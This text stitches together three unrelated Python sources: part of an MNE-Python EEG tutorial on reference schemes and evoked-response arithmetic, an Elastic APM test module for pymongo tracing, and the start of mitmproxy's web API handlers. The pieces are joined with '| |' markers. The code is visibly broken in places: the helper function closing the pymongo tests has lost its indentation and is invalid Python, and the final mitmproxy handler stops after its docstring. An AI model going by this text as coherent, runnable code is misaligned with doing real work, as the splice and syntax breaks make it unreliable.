evoked_car = mne.Epochs(raw_car, **epochs_params).average()
del raw_car  # save memory
title = 'EEG Average reference'
evoked_car.plot(titles=dict(eeg=title), time_unit='s')
evoked_car.plot_topomap(times=[0.1], size=3., title=title, time_unit='s')
###############################################################################
# **Custom reference**: Use the mean of channels EEG 001 and EEG 002 as
# a reference
raw_custom, _ = mne.set_eeg_reference(raw, ['EEG 001', 'EEG 002'])
evoked_custom = mne.Epochs(raw_custom, **epochs_params).average()
del raw_custom  # save memory
title = 'EEG Custom reference'
evoked_custom.plot(titles=dict(eeg=title), time_unit='s')
evoked_custom.plot_topomap(times=[0.1], size=3., title=title, time_unit='s')
###############################################################################
# Evoked response averaged across channels by ROI
# -----------------------------------------------
#
# It is possible to average channels by region of interest (for example left
# and right) when studying the response to this left auditory stimulus. Here we
# use our Raw object on which the average reference projection has been added
# back.
evoked = mne.Epochs(raw, **epochs_params).average()
left_idx = mne.pick_channels(evoked.info['ch_names'],
                             ['EEG 017', 'EEG 018', 'EEG 025', 'EEG 026'])
right_idx = mne.pick_channels(evoked.info['ch_names'],
                              ['EEG 023', 'EEG 024', 'EEG 034', 'EEG 035'])
roi_dict = dict(Left=left_idx, Right=right_idx)
evoked_combined = combine_channels(evoked, roi_dict, method='mean')
title = 'Evoked response averaged by side'
evoked_combined.plot(titles=dict(eeg=title), time_unit='s')
###############################################################################
# Evoked arithmetic (e.g. differences)
# ------------------------------------
#
# Trial subsets from Epochs can be selected using 'tags' separated by '/'.
# Evoked objects support basic arithmetic.
# First, we create an Epochs object containing 4 conditions.
event_id = {'left/auditory': 1, 'right/auditory': 2,
            'left/visual': 3, 'right/visual': 4}
epochs_params = dict(events=events, event_id=event_id, tmin=tmin, tmax=tmax,
                     reject=reject)
epochs = mne.Epochs(raw, **epochs_params)
print(epochs)
###############################################################################
# Next, we create averages of stimulation-left vs stimulation-right trials.
# We can use negative weights in `mne.combine_evoked` to construct difference
# ERPs.
left, right = epochs["left"].average(), epochs["right"].average()
# create and plot difference ERP
joint_kwargs = dict(ts_args=dict(time_unit='s'),
                    topomap_args=dict(time_unit='s'))
mne.combine_evoked([left, right], weights=[1, -1]).plot_joint(**joint_kwargs)
###############################################################################
# This is an equal-weighting difference. If you have imbalanced trial numbers,
# you could also consider either equalizing the number of events per
# condition (using
# `epochs.equalize_event_counts <mne.Epochs.equalize_event_counts>`) or
# use weights proportional to the number of trials averaged together to create
# each `~mne.Evoked` (by passing ``weights='nave'`` to `~mne.combine_evoked`).
# As an example, first, we create individual ERPs for each condition.
aud_l = epochs["auditory/left"].average()
aud_r = epochs["auditory/right"].average()
vis_l = epochs["visual/left"].average()
vis_r = epochs["visual/right"].average()
all_evokeds = [aud_l, aud_r, vis_l, vis_r]
print(all_evokeds)
###############################################################################
# This can be simplified with a Python list comprehension:
all_evokeds = [epochs[cond].average() for cond in sorted(event_id.keys())]
print(all_evokeds)
# Then, we can construct and plot an unweighted average of left vs. right
# trials this way, too:
# (conditions sort alphabetically: auditory/left, auditory/right,
# visual/left, visual/right — hence the +/- 0.5 weight pattern)
mne.combine_evoked(
    all_evokeds, weights=[0.5, 0.5, -0.5, -0.5]).plot_joint(**joint_kwargs)
###############################################################################
# Often, it makes sense to store Evoked objects in a dictionary or a list -
# either different conditions, or different subjects.
# If they are stored in a list, they can be easily averaged, for example,
# for a grand average across subjects (or conditions).
grand_average = mne.grand_average(all_evokeds)
# And they can be written to disk like any other evoked data, e.g.:
# mne.write_evokeds('tmp-ave.fif', all_evokeds)
# If Evokeds objects are stored in a dictionary, they can be retrieved by name.
all_evokeds = dict((cond, epochs[cond].average()) for cond in event_id)
print(all_evokeds['left/auditory'])
# Besides for explicit access, this can be used for example to set titles.
for cond in all_evokeds:
    all_evokeds[cond].plot_joint(title=cond, **joint_kwargs)
| |
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
import os
import pytest
from elasticapm.conf.constants import TRANSACTION
# pymongo is an optional dependency: skip the whole module if it is missing.
pymongo = pytest.importorskip("pymongo")
# Mark every test in this module as a mongodb test.
pytestmark = [pytest.mark.mongodb]
# The integration tests need a live server; without MONGODB_HOST, skip them.
if "MONGODB_HOST" not in os.environ:
    pytestmark.append(pytest.mark.skip("Skipping mongodb tests, no MONGODB_HOST environment variable set"))
@pytest.fixture()
def mongo_database():
    """Yield a throw-away ``elasticapm_test`` database on the configured server."""
    connection_params = {
        "host": os.environ.get("MONGODB_HOST", "localhost"),
        "port": int(os.environ.get("MONGODB_PORT", 27017)),
    }
    if pymongo.version_tuple < (3, 0):
        # Pre-3.0 clients need "safe" for acknowledged writes; 3.0+ acknowledges by default.
        connection_params["safe"] = True
    mongo = pymongo.MongoClient(**connection_params)
    db = mongo.elasticapm_test
    yield db
    # Teardown: drop the test database and close the client connection.
    mongo.drop_database("elasticapm_test")
    mongo.close()
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_bulk_write(instrument, elasticapm_client, mongo_database):
    """bulk_write() should be traced as a single mongodb span."""
    elasticapm_client.begin_transaction("transaction.test")
    operations = [
        pymongo.InsertOne({"x": 1}),
        pymongo.DeleteOne({"x": 1}),
        pymongo.ReplaceOne({"w": 1}, {"z": 1}, upsert=True),
    ]
    result = mongo_database.blogposts.bulk_write(operations)
    assert (result.inserted_count, result.deleted_count, result.upserted_count) == (1, 1, 1)
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.bulk_write"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_count(instrument, elasticapm_client, mongo_database):
    """The deprecated count() helper should produce a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert(post)
    elasticapm_client.begin_transaction("transaction.test")
    assert mongo_database.blogposts.count() == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.count"
    expected_destination = {
        "address": os.environ.get("MONGODB_HOST", "localhost"),
        "port": int(os.environ.get("MONGODB_PORT", 27017)),
        "service": {"name": "", "resource": "mongodb", "type": ""},
    }
    assert span["context"]["destination"] == expected_destination
@pytest.mark.skipif(pymongo.version_tuple < (3, 7), reason="New in 3.7")
@pytest.mark.integrationtest
def test_collection_count_documents(instrument, elasticapm_client, mongo_database):
    """count_documents() should produce a mongodb span with destination info."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert_one(post)
    elasticapm_client.begin_transaction("transaction.test")
    assert mongo_database.blogposts.count_documents({"author": "Tom"}) == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.count_documents"
    expected_destination = {
        "address": os.environ.get("MONGODB_HOST", "localhost"),
        "port": int(os.environ.get("MONGODB_PORT", 27017)),
        "service": {"name": "", "resource": "mongodb", "type": ""},
    }
    assert span["context"]["destination"] == expected_destination
@pytest.mark.skipif(pymongo.version_tuple < (3, 7), reason="New in 3.7")
@pytest.mark.integrationtest
def test_collection_estimated_document_count(instrument, elasticapm_client, mongo_database):
    """estimated_document_count() should produce a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert_one(post)
    elasticapm_client.begin_transaction("transaction.test")
    assert mongo_database.blogposts.estimated_document_count() == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.estimated_document_count"
    expected_destination = {
        "address": os.environ.get("MONGODB_HOST", "localhost"),
        "port": int(os.environ.get("MONGODB_PORT", 27017)),
        "service": {"name": "", "resource": "mongodb", "type": ""},
    }
    assert span["context"]["destination"] == expected_destination
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_delete_one(instrument, elasticapm_client, mongo_database):
    """delete_one() should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert_one(post)
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.delete_one({"author": "Tom"})
    assert result.deleted_count == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.delete_one"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_delete_many(instrument, elasticapm_client, mongo_database):
    """delete_many() should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert_one(post)
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.delete_many({"author": "Tom"})
    assert result.deleted_count == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.delete_many"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_insert(instrument, elasticapm_client, mongo_database):
    """The legacy insert() helper should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    elasticapm_client.begin_transaction("transaction.test")
    assert mongo_database.blogposts.insert(post) is not None
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.insert"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_insert_one(instrument, elasticapm_client, mongo_database):
    """insert_one() should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.insert_one(post)
    assert result.inserted_id is not None
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.insert_one"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_insert_many(instrument, elasticapm_client, mongo_database):
    """insert_many() should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.insert_many([post])
    assert len(result.inserted_ids) == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.insert_many"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_find(instrument, elasticapm_client, mongo_database):
    """Cursor iteration should be traced as a ``cursor.refresh`` span.

    Fixes over the previous version: the extra, never-queried document and
    the unused ``r`` bindings are gone, the query result is now actually
    asserted, and the double-negative version check reads forward.
    """
    blogposts = [{"author": "Tom", "comments": i} for i in range(1000)]
    mongo_database.blogposts.insert(blogposts)
    elasticapm_client.begin_transaction("transaction.test")
    results = list(mongo_database.blogposts.find({"comments": {"$gt": 995}}))
    # comments 996..999 match the $gt filter.
    assert len(results) == 4
    elasticapm_client.end_transaction("transaction.test")
    transactions = elasticapm_client.events[TRANSACTION]
    spans = elasticapm_client.spans_for_transaction(transactions[0])
    span = _get_pymongo_span(spans)
    assert span["type"] == "db"
    assert span["subtype"] == "mongodb"
    assert span["action"] == "query"
    assert span["name"] == "elasticapm_test.blogposts.cursor.refresh"
    if pymongo.version_tuple >= (3, 0):
        # Destination metadata is only captured on pymongo 3.0+.
        assert span["context"]["destination"] == {
            "address": os.environ.get("MONGODB_HOST", "localhost"),
            "port": int(os.environ.get("MONGODB_PORT", 27017)),
            "service": {"name": "", "resource": "mongodb", "type": ""},
        }
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_find_one(instrument, elasticapm_client, mongo_database):
    """find_one() should be traced with full destination metadata."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert_one(post)
    elasticapm_client.begin_transaction("transaction.test")
    found = mongo_database.blogposts.find_one({"author": "Tom"})
    assert found["author"] == "Tom"
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.find_one"
    expected_destination = {
        "address": os.environ.get("MONGODB_HOST", "localhost"),
        "port": int(os.environ.get("MONGODB_PORT", 27017)),
        "service": {"name": "", "resource": "mongodb", "type": ""},
    }
    assert span["context"]["destination"] == expected_destination
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_remove(instrument, elasticapm_client, mongo_database):
    """The legacy remove() helper should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert(post)
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.remove({"author": "Tom"})
    assert result["n"] == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.remove"
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.integrationtest
def test_collection_update(instrument, elasticapm_client, mongo_database):
    """The legacy update() helper should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert(post)
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.update({"author": "Tom"}, {"$set": {"author": "Jerry"}})
    assert result["n"] == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.update"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_update_one(instrument, elasticapm_client, mongo_database):
    """update_one() should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert_one(post)
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.update_one({"author": "Tom"}, {"$set": {"author": "Jerry"}})
    assert result.modified_count == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.update_one"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
@pytest.mark.skipif(pymongo.version_tuple < (3, 0), reason="New in 3.0")
def test_collection_update_many(instrument, elasticapm_client, mongo_database):
    """update_many() should be traced as a mongodb span."""
    post = {"author": "Tom", "text": "Foo", "date": datetime.datetime.utcnow()}
    mongo_database.blogposts.insert_one(post)
    elasticapm_client.begin_transaction("transaction.test")
    result = mongo_database.blogposts.update_many({"author": "Tom"}, {"$set": {"author": "Jerry"}})
    assert result.modified_count == 1
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.blogposts.update_many"
@pytest.mark.integrationtest
@pytest.mark.skipif(pymongo.version_tuple < (2, 7), reason="New in 2.7")
@pytest.mark.skipif(pymongo.version_tuple >= (4, 0), reason="Removed in 4.0")
def test_bulk_execute(instrument, elasticapm_client, mongo_database):
    """The legacy bulk-operation builder should be traced as bulk.execute."""
    elasticapm_client.begin_transaction("transaction.test")
    bulk = mongo_database.test_bulk.initialize_ordered_bulk_op()
    bulk.insert({"x": "y"})
    bulk.insert({"z": "x"})
    bulk.find({"x": "y"}).replace_one({"x": "z"})
    bulk.execute()
    elasticapm_client.end_transaction("transaction.test")
    transaction = elasticapm_client.events[TRANSACTION][0]
    span = _get_pymongo_span(elasticapm_client.spans_for_transaction(transaction))
    assert (span["type"], span["subtype"], span["action"]) == ("db", "mongodb", "query")
    assert span["name"] == "elasticapm_test.test_bulk.bulk.execute"
def _get_pymongo_span(spans):
for span in spans:
if span["subtype"] == "mongodb":
return span
| |
import hashlib
import json
import logging
import os.path
import re
from io import BytesIO
import mitmproxy.addons.view
import mitmproxy.flow
import tornado.escape
import tornado.web
import tornado.websocket
from mitmproxy import contentviews
from mitmproxy import exceptions
from mitmproxy import flowfilter
from mitmproxy import http
from mitmproxy import io
from mitmproxy import log
from mitmproxy import version
def flow_to_json(flow: mitmproxy.flow.Flow) -> dict:
    """
    Remove flow message content and cert to save transmission space.

    Args:
        flow: The original flow.

    Returns:
        A JSON-serializable dict in the wire format the web frontend expects.
    """
    f = {
        "id": flow.id,
        "intercepted": flow.intercepted,
        "client_conn": flow.client_conn.get_state(),
        "server_conn": flow.server_conn.get_state(),
        "type": flow.type,
        "modified": flow.modified(),
        "marked": flow.marked,
    }
    # .alpn_proto_negotiated is bytes, we need to decode that.
    for conn in "client_conn", "server_conn":
        if f[conn]["alpn_proto_negotiated"] is None:
            continue
        f[conn]["alpn_proto_negotiated"] = \
            f[conn]["alpn_proto_negotiated"].decode(errors="backslashreplace")
    if flow.error:
        f["error"] = flow.error.get_state()
    if isinstance(flow, http.HTTPFlow):
        if flow.request:
            # Bodies are not serialized; only their length and a sha256 hash
            # are sent so the client can fetch/cache content on demand.
            if flow.request.raw_content:
                content_length = len(flow.request.raw_content)
                content_hash = hashlib.sha256(flow.request.raw_content).hexdigest()
            else:
                content_length = None
                content_hash = None
            f["request"] = {
                "method": flow.request.method,
                "scheme": flow.request.scheme,
                "host": flow.request.host,
                "port": flow.request.port,
                "path": flow.request.path,
                "http_version": flow.request.http_version,
                "headers": tuple(flow.request.headers.items(True)),
                "contentLength": content_length,
                "contentHash": content_hash,
                "timestamp_start": flow.request.timestamp_start,
                "timestamp_end": flow.request.timestamp_end,
                "is_replay": flow.request.is_replay,
                "pretty_host": flow.request.pretty_host,
            }
        if flow.response:
            # Same length+hash treatment for the response body.
            if flow.response.raw_content:
                content_length = len(flow.response.raw_content)
                content_hash = hashlib.sha256(flow.response.raw_content).hexdigest()
            else:
                content_length = None
                content_hash = None
            f["response"] = {
                "http_version": flow.response.http_version,
                "status_code": flow.response.status_code,
                "reason": flow.response.reason,
                "headers": tuple(flow.response.headers.items(True)),
                "contentLength": content_length,
                "contentHash": content_hash,
                "timestamp_start": flow.response.timestamp_start,
                "timestamp_end": flow.response.timestamp_end,
                "is_replay": flow.response.is_replay,
            }
    # Certificates are not JSON-serializable and are not needed client-side.
    f.get("server_conn", {}).pop("cert", None)
    f.get("client_conn", {}).pop("mitmcert", None)
    return f
def logentry_to_json(e: log.LogEntry) -> dict:
    """Serialize a single log entry for the web frontend."""
    # id(e) is stable for the object's lifetime, which is all the
    # frontend needs to key entries.
    return {"id": id(e), "message": e.msg, "level": e.level}
class APIError(tornado.web.HTTPError):
    # Raised by handlers; RequestHandler.write_error renders its
    # log_message as the plain response body.
    pass
class RequestHandler(tornado.web.RequestHandler):
    """Common base for all mitmweb API handlers.

    Adds JSON body helpers, security headers on every response, and
    convenient access to the master, the flow view, and the current flow.
    """
    def write(self, chunk):
        """Write a chunk, JSON-encoding top-level lists."""
        # Writing arrays on the top level is ok nowadays.
        # http://flask.pocoo.org/docs/0.11/security/#json-security
        if isinstance(chunk, list):
            chunk = tornado.escape.json_encode(chunk)
            self.set_header("Content-Type", "application/json; charset=UTF-8")
        super(RequestHandler, self).write(chunk)
    def set_default_headers(self):
        # Defense-in-depth headers applied to every response.
        super().set_default_headers()
        self.set_header("Server", version.MITMPROXY)
        self.set_header("X-Frame-Options", "DENY")
        self.add_header("X-XSS-Protection", "1; mode=block")
        self.add_header("X-Content-Type-Options", "nosniff")
        self.add_header(
            "Content-Security-Policy",
            "default-src 'self'; "
            "connect-src 'self' ws://* ; "
            "style-src 'self' 'unsafe-inline'"
        )
    @property
    def json(self):
        """Parse the request body as JSON; raise APIError(400) on failure."""
        if not self.request.headers.get("Content-Type", "").startswith("application/json"):
            raise APIError(400, "Invalid Content-Type, expected application/json.")
        try:
            return json.loads(self.request.body.decode())
        except Exception as e:
            raise APIError(400, "Malformed JSON: {}".format(str(e)))
    @property
    def filecontents(self):
        """
        Accept either a multipart/form file upload or just take the plain request body.
        """
        if self.request.files:
            return next(iter(self.request.files.values()))[0].body
        else:
            return self.request.body
    @property
    def view(self) -> mitmproxy.addons.view.View:
        # The flow store shared with the rest of mitmproxy.
        return self.application.master.view
    @property
    def master(self) -> "mitmproxy.tools.web.master.WebMaster":
        return self.application.master
    @property
    def flow(self) -> mitmproxy.flow.Flow:
        """Look up the flow addressed by the URL; raise APIError(404) if missing."""
        flow_id = str(self.path_kwargs["flow_id"])
        # FIXME: Add a facility to addon.view to safely access the store
        flow = self.view.get_by_id(flow_id)
        if flow:
            return flow
        else:
            raise APIError(404, "Flow not found.")
    def write_error(self, status_code: int, **kwargs):
        # Render APIError messages as a plain body instead of Tornado's
        # default HTML error page.
        if "exc_info" in kwargs and isinstance(kwargs["exc_info"][1], APIError):
            self.finish(kwargs["exc_info"][1].log_message)
        else:
            super().write_error(status_code, **kwargs)
class IndexHandler(RequestHandler):
    def get(self):
        """Serve the single-page app, ensuring the XSRF cookie is set."""
        # Accessing xsrf_token has the side effect of setting the cookie;
        # the binding is kept so the access survives `python -O`.
        token = self.xsrf_token # https://github.com/tornadoweb/tornado/issues/645
        assert token
        self.render("index.html")
class FilterHelp(RequestHandler):
    def get(self):
        """Expose the flow-filter syntax help to the frontend."""
        self.write({"commands": flowfilter.help})
class WebSocketEventBroadcaster(tornado.websocket.WebSocketHandler):
    """Fan-out websocket handler: broadcast() sends to every open connection."""
    # raise an error if inherited class doesn't specify its own instance.
    connections = None # type: set
    def open(self):
        self.connections.add(self)
    def on_close(self):
        self.connections.remove(self)
    @classmethod
    def broadcast(cls, **kwargs):
        # surrogateescape lets payloads containing lone surrogates survive
        # the utf-8 encode instead of raising.
        message = json.dumps(kwargs, ensure_ascii=False).encode("utf8", "surrogateescape")
        # NOTE(review): iterates cls.connections directly; if a failing write
        # ever removed a connection synchronously this would mutate the set
        # during iteration — confirm on_close is only scheduled, not inlined.
        for conn in cls.connections:
            try:
                conn.write_message(message)
            except Exception: # pragma: no cover
                logging.error("Error sending message", exc_info=True)
class ClientConnection(WebSocketEventBroadcaster):
    # Class-level registry of open /updates websocket connections.
    connections = set() # type: set
class Flows(RequestHandler):
    def get(self):
        """Return every flow in the view, serialized for the frontend."""
        serialized = [flow_to_json(flow) for flow in self.view]
        self.write(serialized)
class DumpFlows(RequestHandler):
    def get(self):
        """Download all flows as a mitmproxy dump file."""
        self.set_header("Content-Disposition", "attachment; filename=flows")
        self.set_header("Content-Type", "application/octet-stream")
        buf = BytesIO()
        writer = io.FlowWriter(buf)
        for flow in self.view:
            writer.add(flow)
        self.write(buf.getvalue())
        buf.close()
    def post(self):
        """Replace the current flows with the uploaded dump file."""
        self.view.clear()
        buf = BytesIO(self.filecontents)
        self.master.load_flows(io.FlowReader(buf))
        buf.close()
class ClearAll(RequestHandler):
    def post(self):
        """Wipe both the flow store and the event log."""
        self.view.clear()
        self.master.events.clear()
class ResumeFlows(RequestHandler):
    def post(self):
        """Resume every intercepted flow in the view."""
        for flow in self.view:
            flow.resume()
            self.view.update(flow)
class KillFlows(RequestHandler):
    def post(self):
        """Kill every live (killable) flow in the view."""
        for flow in self.view:
            if not flow.killable:
                continue
            flow.kill()
            self.view.update(flow)
class ResumeFlow(RequestHandler):
    def post(self, flow_id):
        """Resume a single intercepted flow."""
        flow = self.flow
        flow.resume()
        self.view.update(flow)
class KillFlow(RequestHandler):
    def post(self, flow_id):
        """Kill a single flow if it is still live."""
        flow = self.flow
        if flow.killable:
            flow.kill()
            self.view.update(flow)
class FlowHandler(RequestHandler):
    def delete(self, flow_id):
        """Kill the flow if it is still live, then remove it from the view."""
        if self.flow.killable:
            self.flow.kill()
        self.view.remove(self.flow)
    def put(self, flow_id):
        """Apply a JSON patch to the flow's request and/or response.

        Any unknown key aborts the whole edit: flow.revert() restores the
        pre-edit state before the error propagates.
        """
        flow = self.flow
        flow.backup()
        try:
            for a, b in self.json.items():
                if a == "request" and hasattr(flow, "request"):
                    request = flow.request
                    for k, v in b.items():
                        if k in ["method", "scheme", "host", "path", "http_version"]:
                            setattr(request, k, str(v))
                        elif k == "port":
                            request.port = int(v)
                        elif k == "headers":
                            # Replace, not merge: clear before re-adding.
                            request.headers.clear()
                            for header in v:
                                request.headers.add(*header)
                        elif k == "content":
                            request.text = v
                        else:
                            raise APIError(400, "Unknown update request.{}: {}".format(k, v))
                elif a == "response" and hasattr(flow, "response"):
                    response = flow.response
                    for k, v in b.items():
                        if k in ["msg", "http_version"]:
                            setattr(response, k, str(v))
                        elif k == "code":
                            response.status_code = int(v)
                        elif k == "headers":
                            # Replace, not merge: clear before re-adding.
                            response.headers.clear()
                            for header in v:
                                response.headers.add(*header)
                        elif k == "content":
                            response.text = v
                        else:
                            raise APIError(400, "Unknown update response.{}: {}".format(k, v))
                else:
                    raise APIError(400, "Unknown update {}: {}".format(a, b))
        except APIError:
            # Roll back the partial edit before re-raising.
            flow.revert()
            raise
        self.view.update(flow)
class DuplicateFlow(RequestHandler):
    def post(self, flow_id):
        """Copy the flow into the view and return the new flow's id."""
        duplicate = self.flow.copy()
        self.view.add(duplicate)
        self.write(duplicate.id)
class RevertFlow(RequestHandler):
    def post(self, flow_id):
        """Undo any local edits made to the flow."""
        flow = self.flow
        if flow.modified():
            flow.revert()
            self.view.update(flow)
class ReplayFlow(RequestHandler):
    def post(self, flow_id):
        """Re-send the flow's request, discarding the old response."""
        flow = self.flow
        flow.backup()
        flow.response = None
        self.view.update(flow)
        try:
            self.master.replay_request(flow)
        except exceptions.ReplayException as e:
            raise APIError(400, str(e))
class FlowContent(RequestHandler):
    def post(self, flow_id, message):
        """Replace the raw content of the flow's request or response."""
